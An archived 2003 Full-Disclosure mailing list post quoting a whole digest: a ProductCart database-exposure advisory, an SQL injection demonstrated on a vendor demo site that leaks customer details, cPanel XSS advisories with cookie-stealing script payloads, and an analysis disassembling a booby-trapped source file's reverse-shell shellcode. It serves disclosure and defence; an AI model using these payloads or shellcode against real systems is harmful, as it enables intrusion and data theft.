lists.openwall.net: Open Source and information security mailing list archives
From: booger at unixclan.net (security snot)
Subject: Re: Full-Disclosure digest, Vol 1 #933 - 11 msgs

Guys -

Could we please limit the length of included replies on this list, to
something sane?  Quoting the entire thread is very annoying.

Thanks.

-----------------------------------------------------------
"Whitehat by day, booger at night - I'm the security snot."
- CISSP / CCNA / A+ Certified - www.unixclan.net/~booger/ -
-----------------------------------------------------------

On Sun, 6 Jul 2003, Markus Nielsen wrote:

> On Sun, 2003-07-06 at 16:00, full-disclosure-request@...ts.netsys.com
> wrote:
> > Send Full-Disclosure mailing list submissions to
> > 	full-disclosure@...ts.netsys.com
> >
> > To subscribe or unsubscribe via the World Wide Web, visit
> > 	http://lists.netsys.com/mailman/listinfo/full-disclosure
> > or, via email, send a message with subject or body 'help' to
> > 	full-disclosure-request@...ts.netsys.com
> >
> > You can reach the person managing the list at
> > 	full-disclosure-admin@...ts.netsys.com
> >
> > When replying, please edit your Subject line so it is more specific
> > than "Re: Contents of Full-Disclosure digest..."
> >
> >
> > Today's Topics:
> >
> >    1. [Vulnerability] : ProductCart database file can be downloaded remotely (Tri Huynh)
> >    2. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (gyrniff)
> >    3. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (KF)
> >    4. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (morning_wood)
> >    5. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
> >    6. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
> >    7. Re: tripbid secure codes (Dave Korn)
> >    8. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (Larry W. Cashdollar)
> >    9. Re: Microsoft Cries Wolf ( again ) (Kristian Hermansen)
> >
> > --__--__--
> >
> > Message: 1
> > From: "Tri Huynh" <trihuynh@...up.com>
> > To: <bugtraq@...urityfocus.com>
> > Cc: <full-disclosure@...ts.netsys.com>
> > Date: Sat, 5 Jul 2003 13:07:51 -0700
> > Subject: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> >
> > ProductCart database file can be downloaded remotely
> > =================================================
> >
> > PROGRAM: ProductCart
> > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > VULNERABLE VERSIONS: 1.0 to 2.0
> > RISK: High
> >
> >
> > DESCRIPTION
> > =================================================
> >
> > ProductCart® is an ASP shopping cart that combines sophisticated
> > ecommerce features with time-saving store management tools and remarkable
> > ease of use. It is widely used by many e-commerce sites.
> >
> > DETAILS
> > =================================================
> >
> > In the default installation, product cart database file is located at
> > /productcart/database/EIPC.mdb which can be accessed easily
> > by any remote attackers.
> >
> > Sample: http://victimhost/productcart/database/EIPC.mdb
> >
> > The database file includes the store administration password as well as
> > customer's info (including credit card info).
> >
> >  WORKAROUND
> > =================================================
> >
> > Rename the database file, put it in a protected directory.
> >
> >
> > CREDITS
> > =================================================
> >
> > Discovered by Tri Huynh from Sentry Union
> >
> >
> > DISCLAIMER
> > =================================================
> >
> > The information within this paper may change without notice. Use of
> > this information constitutes acceptance for use in an AS IS condition.
> > There are NO warranties with regard to this information. In no event
> > shall the author be liable for any damages whatsoever arising out of
> > or in connection with the use or spread of this information. Any use
> > of this information is at the user's own risk.
> >
> >
> > FEEDBACK
> > =================================================
> >
> > Please send suggestions, updates, and comments to: trihuynh@...up.com
> >
> >
> > --__--__--
> >
> > Message: 2
> > From: gyrniff <b240503@...niff.dk>
> > To: full-disclosure@...ts.netsys.com
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> > Date: Sat, 5 Jul 2003 19:37:41 +0200
> >
> > URL:
> > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > Change the name Paul to Paul'
> >
> > Microsoft OLE DB Provider for ODBC Drivers
> >  error '80040e14'
> > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> >
> > have a nice weekend ;-)
> >
> > On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > ProductCart database file can be downloaded remotely
> > > =================================================
> > >
> > > PROGRAM: ProductCart
> > > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > VULNERABLE VERSIONS: 1.0 to 2.0
> > > RISK: High
> > >
> > >
> > > DESCRIPTION
> > > =================================================
> > >
> > > ProductCart® is an ASP shopping cart that combines sophisticated
> > > ecommerce features with time-saving store management tools and remarkable
> > > ease of use. It is widely used by many e-commerce sites.
> > >
> > > DETAILS
> > > =================================================
> > >
> > > In the default installation, product cart database file is located at
> > > /productcart/database/EIPC.mdb which can be accessed easily
> > > by any remote attackers.
> > >
> > > Sample: http://victimhost/productcart/database/EIPC.mdb
> > >
> > > The database file includes the store administration password as well as
> > > customer's info (including credit card info).
> > >
> > >
> > >  WORKAROUND
> > > =================================================
> > >
> > > Rename the database file, put it in a protected directory.
> > >
> > >
> > > CREDITS
> > > =================================================
> > >
> > > Discovered by Tri Huynh from Sentry Union
> > >
> > >
> > > DISCLAIMER
> > > =================================================
> > >
> > > The information within this paper may change without notice. Use of
> > > this information constitutes acceptance for use in an AS IS condition.
> > > There are NO warranties with regard to this information. In no event
> > > shall the author be liable for any damages whatsoever arising out of
> > > or in connection with the use or spread of this information. Any use
> > > of this information is at the user's own risk.
> > >
> > >
> > > FEEDBACK
> > > =================================================
> > >
> > > Please send suggestions, updates, and comments to: trihuynh@...up.com
> >
> >
> > --__--__--
> >
> > Message: 3
> > Date: Sat, 05 Jul 2003 15:30:28 -0400
> > From: KF <dotslash@...soft.com>
> > To: gyrniff <b240503@...niff.dk>
> > CC: full-disclosure@...ts.netsys.com
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> >
> > Was that legit California data? I am sure that, rather than making someone
> > have a nice weekend, you just made multiple someones have a shitty month
> > ahead of them...
> > http://www.theregister.co.uk/content/55/31509.html
> >
> > -KF
> >
> > gyrniff wrote:
> >
> > >URL:
> > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > >Change the name Paul to Paul'
> > >
> > >Microsoft OLE DB Provider for ODBC Drivers
> > > error '80040e14'
> > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > >address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> > >
> > >have a nice weekend ;-)
> > >
> > >On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > >
> > >
> > >>ProductCart database file can be downloaded remotely
> > >>=================================================
> > >>
> > >>PROGRAM: ProductCart
> > >>HOMEPAGE: http://www.earlyimpact.com/productcart/
> > >>VULNERABLE VERSIONS: 1.0 to 2.0
> > >>RISK: High
> > >>
> > >>
> > >>DESCRIPTION
> > >>=================================================
> > >>
> > >>ProductCart® is an ASP shopping cart that combines sophisticated
> > >>ecommerce features with time-saving store management tools and remarkable
> > >>ease of use. It is widely used by many e-commerce sites.
> > >>
> > >>DETAILS
> > >>=================================================
> > >>
> > >>In the default installation, product cart database file is located at
> > >>/productcart/database/EIPC.mdb which can be accessed easily
> > >>by any remote attackers.
> > >>
> > >>Sample: http://victimhost/productcart/database/EIPC.mdb
> > >>
> > >>The database file includes the store administration password as well as
> > >>customer's info (including credit card info).
> > >>
> > >>
> > >> WORKAROUND
> > >>=================================================
> > >>
> > >>Rename the database file, put it in a protected directory.
> > >>
> > >>
> > >>CREDITS
> > >>=================================================
> > >>
> > >>Discovered by Tri Huynh from Sentry Union
> > >>
> > >>
> > >>DISCLAIMER
> > >>=================================================
> > >>
> > >>The information within this paper may change without notice. Use of
> > >>this information constitutes acceptance for use in an AS IS condition.
> > >>There are NO warranties with regard to this information. In no event
> > >>shall the author be liable for any damages whatsoever arising out of
> > >>or in connection with the use or spread of this information. Any use
> > >>of this information is at the user's own risk.
> > >>
> > >>
> > >>FEEDBACK
> > >>=================================================
> > >>
> > >>Please send suggestions, updates, and comments to: trihuynh@...up.com
> > >>
> > >>
> > >
> > >_______________________________________________
> > >Full-Disclosure - We believe in it.
> > >Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> > >
> > >
> >
> >
> >
> > --__--__--
> >
> > Message: 4
> > From: "morning_wood" <se_cur_ity@...mail.com>
> > To: "gyrniff" <b240503@...niff.dk>, <full-disclosure@...ts.netsys.com>
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> > Date: Sat, 5 Jul 2003 15:24:46 -0700
> >
> > vuln to XSS too..
> >
> > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/manageCategories.asp
> >
> > ----- Original Message -----
> > From: "gyrniff" <b240503@...niff.dk>
> > To: <full-disclosure@...ts.netsys.com>
> > Sent: Saturday, July 05, 2003 10:37 AM
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> >
> >
> > > URL:
> > > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > > Change the name Paul to Paul'
> > >
> > > Microsoft OLE DB Provider for ODBC Drivers
> > >  error '80040e14'
> > > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > > query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > > address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > > /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> > >
> > > have a nice weekend ;-)
> > >
> > > On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > > ProductCart database file can be downloaded remotely
> > > > =================================================
> > > >
> > > > PROGRAM: ProductCart
> > > > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > > VULNERABLE VERSIONS: 1.0 to 2.0
> > > > RISK: High
> > > >
> > > >
> > > > DESCRIPTION
> > > > =================================================
> > > >
> > > > ProductCart® is an ASP shopping cart that combines sophisticated
> > > > ecommerce features with time-saving store management tools and remarkable
> > > > ease of use. It is widely used by many e-commerce sites.
> > > >
> > > > DETAILS
> > > > =================================================
> > > >
> > > > In the default installation, product cart database file is located at
> > > > /productcart/database/EIPC.mdb which can be accessed easily
> > > > by any remote attackers.
> > > >
> > > > Sample: http://victimhost/productcart/database/EIPC.mdb
> > > >
> > > > The database file includes the store administration password as well as
> > > > customer's info (including credit card info).
> > > >
> > > >
> > > >  WORKAROUND
> > > > =================================================
> > > >
> > > > Rename the database file, put it in a protected directory.
> > > >
> > > >
> > > > CREDITS
> > > > =================================================
> > > >
> > > > Discovered by Tri Huynh from Sentry Union
> > > >
> > > >
> > > > DISCLAIMER
> > > > =================================================
> > > >
> > > > The information within this paper may change without notice. Use of
> > > > this information constitutes acceptance for use in an AS IS condition.
> > > > There are NO warranties with regard to this information. In no event
> > > > shall the author be liable for any damages whatsoever arising out of
> > > > or in connection with the use or spread of this information. Any use
> > > > of this information is at the user's own risk.
> > > >
> > > >
> > > > FEEDBACK
> > > > =================================================
> > > >
> > > > Please send suggestions, updates, and comments to: trihuynh@...up.com
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> >
> > --__--__--
> >
> > Message: 5
> > From: Ory Segal <ORY.SEGAL@...CTUMINC.COM>
> > To: "BugTraq (E-mail)" <BUGTRAQ@...URITYFOCUS.COM>,
> >    "Full Disclosure (E-mail)" <full-disclosure@...ts.netsys.com>,
> >    "WebAppSec (E-mail)" <webappsec@...URITYFOCUS.COM>
> > Date: Sun, 6 Jul 2003 01:39:33 -0700
> > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability
> >
> > ///////////////////////////////////////////////////////////////////////////////
> > //==========================>> Security Advisory <<==========================//
> > ///////////////////////////////////////////////////////////////////////////////
> >
> > -------------------------------------------------------------------------------
> > -----[ cPanel Malicious HTML Tags Injection Vulnerability
> > -------------------------------------------------------------------------------
> >
> > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com
> > --[ Discovery Date: 06/17/2003 (Vendor was notified)
> > --[ Release Date: 07/06/2003
> > --[ Product: Tested on cPanel 6.4.2-STABLE
> > --[ Severity: Medium
> > --[ CVE: Not assigned yet
> >
> > --[ Summary
> >
> > From the vendor's web site:
> > "...The Cpanel interface is a client side interface, which allows your customers
> > to easily control a web hosting account. With the touch of a button, they can
> > add e-mail accounts, access their files, backup their files, setup a shopping
> > cart, and more..."
> >
> > Web users can embed Malicious HTML tags in HTTP requests, which will later
> > be parsed by the web site administrator's browser, in several cPanel screens.
> > This may lead to theft of cookies associated with the domain, or execution of
> > client-side scripts in the administrator's browser.
> >
> > --[ Description
> >
> > The 'Error Log' and 'Latest Visitors' screens in cPanel provide the web site
> > administrator with HTTP request logs. These scripts do not sanitize the URL part
> > of HTTP requests and present them to the administrator as is, thus allowing an
> > attacker to embed malicious HTML tags that will later be parsed and executed by
> > the administrator's browser.
> >
> > For example, lets take a look at the 'Error Log' screen:
> >
> > [From errlog.html]
> > ...
> > <b>Last 300 Error Log Messages in reverse order:</b><hr>
> > <pre>
> > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
> > /home/dir/public_html/foobar.html
> > </pre>
> > ...
> >
> > The following request will present a pop-up screen with the cookies
> > that are currently associated with the domain:
> >
> >   GET /<script>alert(document.cookie);</script> HTTP/1.0
> >   Host: www.site.com
> >
> >
> > --[ Note
> >
> > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented the
> > latest requests as HTML links, thus the malicious payload must terminate the <a>
> > tag before opening a new one. For example:
> >
> >   GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
> >   Host: www.site.com
> >
> > --[ Solution
> >
> > According to the vendor, the problem was fixed in version 7.0, which can be
> > downloaded at: http://www.cpanel.net/downloads.htm
> >
> >
> >
> >
> >           Ory Segal
> >   Senior Security Engineer
> >         Sanctum, Inc.
> >  http://www.SanctumInc.Com/
> >
> > Ampa Bldg.,  1 Sapir Street.
> > Mail:     P.O.Box      12047
> > Herzliya    46733,    ISRAEL
> >
> > Tel: +972-9-9586077 Ext. 236
> > Fax: +972-9-9576337
> >
> >
> > --__--__--
> >
> > Message: 6
> > Date: Sun, 06 Jul 2003 11:46:44 +0300
> > From: Ory Segal <ory.segal@...ctuminc.com>
> > To: BUGTRAQ@...URITYFOCUS.COM, full-disclosure@...ts.netsys.com,
> >    webappsec@...URITYFOCUS.COM
> > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability
> >
> > -------------------------------------------------------------------------------
> > -----[ cPanel Malicious HTML Tags Injection Vulnerability
> > -------------------------------------------------------------------------------
> >
> > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com
> > --[ Discovery Date: 06/17/2003 (Vendor was notified)
> > --[ Release Date: 07/06/2003
> > --[ Product: Tested on cPanel 6.4.2-STABLE
> > --[ Severity: Medium
> > --[ CVE: Not assigned yet
> >
> > --[ Summary
> >
> > From the vendor's web site:
> > "...The Cpanel interface is a client side interface, which allows your customers
> > to easily control a web hosting account. With the touch of a button, they can
> > add e-mail accounts, access their files, backup their files, setup a shopping
> > cart, and more..."
> >
> > Web users can embed Malicious HTML tags in HTTP requests, which will later
> > be parsed by the web site administrator's browser, in several cPanel screens.
> > This may lead to theft of cookies associated with the domain, or execution of
> > client-side scripts in the administrator's browser.
> >
> > --[ Description
> >
> > The 'Error Log' and 'Latest Visitors' screens in cPanel provide the web site
> > administrator with HTTP request logs. These scripts do not sanitize the URL part
> > of HTTP requests and present them to the administrator as is, thus allowing an
> > attacker to embed malicious HTML tags that will later be parsed and executed by
> > the administrator's browser.
> >
> > For example, lets take a look at the 'Error Log' screen:
> >
> > [From errlog.html]
> > ...
> > <b>Last 300 Error Log Messages in reverse order:</b><hr>
> > <pre>
> > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
> > /home/dir/public_html/foobar.html
> > </pre>
> > ...
> >
> > The following request will present a pop-up screen with the cookies
> > that are currently associated with the domain:
> >
> >   GET /<script>alert(document.cookie);</script> HTTP/1.0
> >   Host: www.site.com
> >
> >
> > --[ Note
> >
> > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE)
> > presented the latest requests as HTML links, thus the malicious payload
> > must terminate the <a> tag before opening a new one. For example:
> >
> >   GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
> >   Host: www.site.com
> >
> > --[ Solution
> >
> > According to the vendor, the problem was fixed in version 7.0, which can be
> > downloaded at: http://www.cpanel.net/downloads.htm
> >
> >
> > --__--__--
> >
> > Message: 7
> > From: "Dave Korn" <davek_throwaway@...mail.com>
> > To: full-disclosure@...ts.netsys.com
> > Subject: Re: [Full-Disclosure] tripbid secure codes
> > Date: Sun, 06 Jul 2003 12:23:01 +0000
> >
> >
> > ----- Original Message -----
> > From: <auto94042@...hmail.com>
> > To: <full-disclosure@...ts.netsys.com>
> > Sent: Friday, June 27, 2003 6:25 AM
> > Subject: [Full-Disclosure] tripbid secure codes
> >
> >
> > >i post the thing to the vuln dev some days ago and get quite a big
> > >response.
> > >not only do i get a heart 2 heat with n1xo reiman about portmon ! but
> > >some folks want me to look at the code they make, specially a 'hello-
> > >world.c' progie -> " holo, can you check my hello-world.c for strcpy
> > >?? securecode do the trick " <- paraphrase the msg, i rm -rf / it since
> > >it make me anger and stress it !
> > >
> > >i am willing to try the secure code since the grep 'strcpy' is losing
> > >his thrills so i trick around with :
> > >[user@...alhost]$ ./securecode -s hello-world.c
> >
> >
> > Never ever EVER run an insecure program over arbitrary data you receive from
> > the net without checking it for safety first.....  Let's look at this
> > hello-world.c before we run anything on it....
> >
> >
> > Z:\sploits-misc\targzip>type hello-world.c
> > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!?
> > ?!? ?!? ?!? ?!? ?!? ?!?
> > ?!??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?1?1?Q??Q??Q??Q?????f????1?1?QQh?b??fh????fQ????SWR?????f??1?9?t?1?????1???????1?????????1?????????1?1?Phn/shh//bi??PS??????1?????
> >
> >
> > Heh.  Boy, did j00 get hax0red!  Here's what's actually in that file:
> >
> > $0000 - $00ff:  'A' x 256
> > $0100 - $011f: DWORD $bffff321 x 8
> > $0120 - $0378: $90 = NOP x 600
> > $0378 - $03fa: Binary shellcode
> > $03fb - $03fc: CR, LF
> > <EOF>
> >
> > In other words, it's one very long line.  Looks to me like the securecode
> > program reads each line of the .c file into a buffer that's only 256 bytes
> > long; this exploit fills it with 'A', then overwrites the return address on
> > the stack with a pointer into the NOP slide.  Here's a disassembly of the
> > shellcode: note that offset 0 in this disassembly is offset $0370 in the
> > file.  Sorry for not commenting this, but I don't speak linux asm; however I
> > can see a whole bunch of syscalls going on in there; the values in eax
> > should tell you whether anything nastier than a few mkdirs was done to
> > you...
> >
> > Z:\sploits-misc\targzip>objdump -D --target=binary hello-world2.bin --architecture=i386
> >
> > hello-world2.bin:     file format binary
> >
> > objdump: hello-world2.bin: no symbols
> > Disassembly of section .data:
> >
> > 00000000 <.data>:
> >    0:   90                      nop
> >    1:   90                      nop
> >    2:   90                      nop
> >    3:   90                      nop
> >    4:   90                      nop
> >    5:   90                      nop
> >    6:   90                      nop
> >    7:   90                      nop
> >    8:   90                      nop
> >    9:   31 c0                   xor    %eax,%eax
> >    b:   31 db                   xor    %ebx,%ebx
> >    d:   31 c9                   xor    %ecx,%ecx
> >    f:   51                      push   %ecx
> >   10:   b1 06                   mov    $0x6,%cl
> >   12:   51                      push   %ecx
> >   13:   b1 01                   mov    $0x1,%cl
> >   15:   51                      push   %ecx
> >   16:   b1 02                   mov    $0x2,%cl
> >   18:   51                      push   %ecx
> >   19:   89 e1                   mov    %esp,%ecx
> >   1b:   b3 01                   mov    $0x1,%bl
> >   1d:   b0 66                   mov    $0x66,%al
> >   1f:   cd 80                   int    $0x80
> >   21:   89 c2                   mov    %eax,%edx
> >   23:   31 c0                   xor    %eax,%eax
> >   25:   31 c9                   xor    %ecx,%ecx
> >   27:   51                      push   %ecx
> >   28:   51                      push   %ecx
> >   29:   68 d4 62 f7 cc          push   $0xccf762d4
> >   2e:   66 68 b0 ef             pushw  $0xefb0
> >   32:   b1 02                   mov    $0x2,%cl
> >   34:   66 51                   push   %cx
> >   36:   89 e7                   mov    %esp,%edi
> >   38:   b3 10                   mov    $0x10,%bl
> >   3a:   53                      push   %ebx
> >   3b:   57                      push   %edi
> >   3c:   52                      push   %edx
> >   3d:   89 e1                   mov    %esp,%ecx
> >   3f:   b3 03                   mov    $0x3,%bl
> >   41:   b0 66                   mov    $0x66,%al
> >   43:   cd 80                   int    $0x80
> >   45:   31 c9                   xor    %ecx,%ecx
> >   47:   39 c1                   cmp    %eax,%ecx
> >   49:   74 06                   je     0x51
> >   4b:   31 c0                   xor    %eax,%eax
> >   4d:   b0 01                   mov    $0x1,%al
> >   4f:   cd 80                   int    $0x80
> >   51:   31 c0                   xor    %eax,%eax
> >   53:   b0 3f                   mov    $0x3f,%al
> >   55:   89 d3                   mov    %edx,%ebx
> >   57:   cd 80                   int    $0x80
> >   59:   31 c0                   xor    %eax,%eax
> >   5b:   b0 3f                   mov    $0x3f,%al
> >   5d:   89 d3                   mov    %edx,%ebx
> >   5f:   b1 01                   mov    $0x1,%cl
> >   61:   cd 80                   int    $0x80
> >   63:   31 c0                   xor    %eax,%eax
> >   65:   b0 3f                   mov    $0x3f,%al
> >   67:   89 d3                   mov    %edx,%ebx
> >   69:   b1 02                   mov    $0x2,%cl
> >   6b:   cd 80                   int    $0x80
> >   6d:   31 c0                   xor    %eax,%eax
> >   6f:   31 d2                   xor    %edx,%edx
> >   71:   50                      push   %eax
> >   72:   68 6e 2f 73 68          push   $0x68732f6e
> >   77:   68 2f 2f 62 69          push   $0x69622f2f
> >   7c:   89 e3                   mov    %esp,%ebx
> >   7e:   50                      push   %eax
> >   7f:   53                      push   %ebx
> >   80:   89 e1                   mov    %esp,%ecx
> >   82:   b0 0b                   mov    $0xb,%al
> >   84:   cd 80                   int    $0x80
> >   86:   31 c0                   xor    %eax,%eax
> >   88:   b0 01                   mov    $0x1,%al
> >   8a:   cd 80                   int    $0x80
> >   8c:   0d                      .byte 0xd
> >   8d:   0a                      .byte 0xa
> >
> >
> >
> >         DaveK
> >
> >
> >
> > --__--__--
> >
> > Message: 8
> > Date: Sun, 6 Jul 2003 11:07:22 -0400 (EDT)
> > From: "Larry W. Cashdollar" <lwc@...id.ath.cx>
> > To: <full-disclosure@...ts.netsys.com>
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file
> >  can be downloaded remotely
> >
> > 949 is a legit zip code in cali.
> >
> >
> > On Sat, 5 Jul 2003, KF wrote:
> >
> > > Was that legit California data? I am sure than making someone have a
> > > nice weekend you just made multiple someones have a shitty month ahead
> > > of them...
> > > http://www.theregister.co.uk/content/55/31509.html
> > >
> > > -KF
> > >
> > > gyrniff wrote:
> > >
> > > >URL:
> > > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > > >Change the name Paul to Paul'
> > > >
> > > >Microsoft OLE DB Provider for ODBC Drivers
> > > > error '80040e14'
> > > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > > >address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> > > >
> > > >have a nice weekend ;-)
> > > >
> > > >On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > >
> > > >
> > > >>ProductCart database file can be downloaded remotely
> > > >>=================================================
> > > >>
> > > >>PROGRAM: ProductCart
> > > >>HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > >>VULNERABLE VERSIONS: 1.0 to 2.0
> > > >>RISK: High
> > > >>
> > > >>
> > > >>DESCRIPTION
> > > >>=================================================
> > > >>
> > > >>ProductCart is an ASP shopping cart that combines sophisticated
> > > >>ecommerce features with time-saving store management tools and remarkable
> > > >>ease of use. It is widely used by many e-commerce sites.
> > > >>
> > > >>DETAILS
> > > >>=================================================
> > > >>
> > > >>In the default installation, product cart database file is located at
> > > >>/productcart/database/EIPC.mdb which can be accessed easily
> > > >>by any remote attackers.
> > > >>
> > > >>Sample: http://victimhost/productcart/database/EIPC.mdb
> > > >>
> > > >>The database file includes the store administration password as well as
> > > >>customer's info (including credit card info).
> > > >>
> > > >>
> > > >> WORKAROUND
> > > >>=================================================
> > > >>
> > > >>Rename the database file, put it in a protected directory.
> > > >>
> > > >>
> > > >>CREDITS
> > > >>=================================================
> > > >>
> > > >>Discovered by Tri Huynh from Sentry Union
> > > >>
> > > >>
> > > >>DISCLAIMER
> > > >>=================================================
> > > >>
> > > >>The information within this paper may change without notice. Use of
> > > >>this information constitutes acceptance for use in an AS IS condition.
> > > >>There are NO warranties with regard to this information. In no event
> > > >>shall the author be liable for any damages whatsoever arising out of
> > > >>or in connection with the use or spread of this information. Any use
> > > >>of this information is at the user's own risk.
> > > >>
> > > >>
> > > >>FEEDBACK
> > > >>=================================================
> > > >>
> > > >>Please send suggestions, updates, and comments to: trihuynh@...up.com
> > > >>
> > > >>
> > > >
> > > >_______________________________________________
> > > >Full-Disclosure - We believe in it.
> > > >Charter: http://lists.netsys.com/full-disclosure-charter.html
> > > >
> > > >
> > > >
> > >
> > >
> >
> >
> > --__--__--
> >
> > Message: 9
> > From: "Kristian Hermansen" <this_is_kris@...mail.com>
> > To: <full-disclosure@...ts.netsys.com>
> > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again )
> > Date: Tue, 1 Jul 2003 22:49:59 -0400
> >
> > Yes, programmers should be trained to write better code...but it is more
> > profitable to allow sloppy code and a simple fix later (behind the scenes
> > with vendor notification).  This is MS's point of view.  This is why they want
> > vendor notification, rather than public notification.  Again, I say let the
> > 0-days fly.
> >
> > Did you know that certain US government agencies have teams whose only
> > job is to break software?  This has been going on since the 1970's.  It
> > helps to produce secure code in mission critical applications that the
> > military needs.  I am not saying that MS needs to be SO drastic...but a
> > small team for their MOST popular products would sure be wise to start with.
> > Why not hire fucking intern teenagers from russia to "Crash Test" their
> > development projects (facetious)?  Would it be so difficult/expensive to
> > hire some of the main companies that are breaking your software???
> >
> > Kris Hermansen
> >
> > ----- Original Message -----
> > From: "Schmehl, Paul L" <pauls@...allas.edu>
> > To: <full-disclosure@...ts.netsys.com>
> > Sent: Tuesday, July 01, 2003 6:58 PM
> > Subject: RE: [Full-Disclosure] Microsoft Cries Wolf ( again )
> >
> >
> > > > -----Original Message-----
> > > > From: Kristian Hermansen [mailto:this_is_kris@...mail.com]
> > > > Sent: Tuesday, July 01, 2003 3:09 PM
> > > > To: full-disclosure@...ts.netsys.com
> > > > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again )
> > > >
> > > >
> > > > I agree.  It is not our problem.  The reason is this.
> > > > Microsoft would like to reduce costs.  Fixing bugs in
> > > > products costs money, and 0-day bugs need immediate fixes
> > > > which slow down MS total output ability.  They would like to
> > > > see everyone reporting to the vendor first because this saves
> > > > them money!!! In this respect, this also allows them to go on
> > > > writing sloppy code in order to save a few bucks on every
> > > > product, thus reducing their overhead.  I don't want sloppy
> > > > code.  Let the 0-days fly....maybe MS will start doing
> > > > extensive testing to their products before they release it
> > > > for sale to millions of customers.  I thought .NET was
> > > > supposed to fix all this  ;-P
> > >
> > > That's too funny.  Microsoft ran a "buffer overflow finder" against the
> > > codebase for XP, and the VP in charge announced publicly that they had
> > > "eliminated buffer overflows in XP".  Within thirty days, eEye announced
> > > the UPnP vulnerability in SSDP, which is the single most devastating
> > > hole ever found in MS products.  (You can compromise an entire network
> > > of XP machines with one attack, simultaneously.)
> > >
> > > You don't fix code by extensive testing.  You fix it by teaching how to
> > > write secure code to begin with *and* by ongoing, consistent audits done
> > > before code is released.  (OpenBSD has been doing this for years, and
> > > look at the results.)
> > >
> > > Paul Schmehl (pauls@...allas.edu)
> > > Adjunct Information Security Officer
> > > The University of Texas at Dallas
> > > AVIEN Founding Member
> > > http://www.utdallas.edu/~pauls/
> >
> >
> > --__--__--
> >
> > _______________________________________________
> > Full-Disclosure mailing list
> > Full-Disclosure@...ts.netsys.com
> > http://lists.netsys.com/mailman/listinfo/full-disclosure
> >
> >
> > End of Full-Disclosure Digest
> --
> Markus Nielsen <intercool@...magnet.com>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
